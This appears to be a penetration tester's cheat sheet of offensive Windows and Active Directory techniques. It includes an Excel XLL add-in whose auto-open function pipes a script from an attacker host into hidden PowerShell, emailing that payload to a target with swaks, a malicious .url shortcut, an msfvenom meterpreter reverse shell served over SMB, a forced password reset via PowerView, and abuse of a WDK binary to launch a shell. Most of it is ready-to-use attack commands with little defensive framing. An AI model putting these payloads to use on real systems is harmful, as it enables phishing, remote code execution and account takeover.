smtp enum

A great way to enum for SMTP service is using nmap, which has a builtin script to do so.

> nmap --script smtp-commands.nse --script-args smtp-commands.domain=target -pT:25,465,587 target 
25/tcp  open     smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
465/tcp filtered smtps
587/tcp filtered submission


XLL’s are DLL’s, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents. XLL’s provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL’s can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

To setup the test environment, follow the steps below

  • Update the code in HelloWorldXll.cpp
#include "stdafx.h"

short __stdcall xlAutoOpen()
	system("curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");
	return 1;
  • Build the project and get the .xll file
  • Prepare the serve the reverse shell, you can refer to a powershell reverse shell here:
  • Send the .xll file to the target via email, or if they have a SMTP server open
> swaks --to test1@target --from test2@target --header "Subject: test" --body "check" --attach @test.xll --server target --port 25

Shortcut URL Injection

  • Shortcut URL injection can be achieved like below
$url = "file:////attacker/share/shell.exe"
$shortcutPath = "C:\path\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
  • You can generate a reverse shell using msfvenom and serve it using a simple SMB server
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share ./path


On Windows (expecially in an AD environment), a user may be able to change another user’s password via the user’s (or group’s) permissions. More specially, check for the following permissions:

  • GenericAll
  • AllExtendedRights
  • User-Force-Change-Password

This can be achieved using SharpHound: and running BloodHound ( locally to analyse the AD forest

> SharpHound.exe -c All --zipfilename

# on kali, setup bloodhound
> apt install bloodhound neo4j
> python3 -m pip install bloodhound

# run, default pass `neo4j:neo4j`
> neo4j console
> bloodhound --no-sandbox

If any of the abovementioned permissions are found, you can change the target user’s password via PowerView:

Invoke-WebRequest -URI http://attacker/PowerView.ps1 -OutFile PowerView.ps1
import-module .\PowerView.ps1
$pass = ConvertTo-SecureString 'password123!@#' -AsPlainText -Force
Set-DomainUserPassword -Identity victim -AccountPassword $pass

Now, you can login via the victim user, if PSRemote permission is enabled for the user

> evil-winrm -i target -u victim -p 'password123!@#'


StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems. It allows developers to execute and debug driver packages in a standalone environment without needing to install them on a target system. The binary can often be found on the following paths

C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x86\standalonerunner.exe
# copy standalonerunner.exe and standalonexml.dll to a directory
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe" standalonerunner.exe
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.dll" standalonerunner.dll

# Create a file named reboot.rsf in the same directory and fill with some content
echo testdir > reboot.rsf
echo True >> reboot.rsf

# Create the required folder structure
mkdir testdir
mkdir testdir\working

# create a rsf.rsf file in the working directory
echo 1 > testdir\working\rsf.rsf

# Create a command.txt file in the current directory and fill it with the command to execute
echo "c:\temp\shell.exe" > command.txt

Windows folder/file enum by keyword

To locate file/folder permissions with a certain keyword, one can use the following commmad

> ICACLS "C:\*." /T /C 2>$null | findstr "keyword"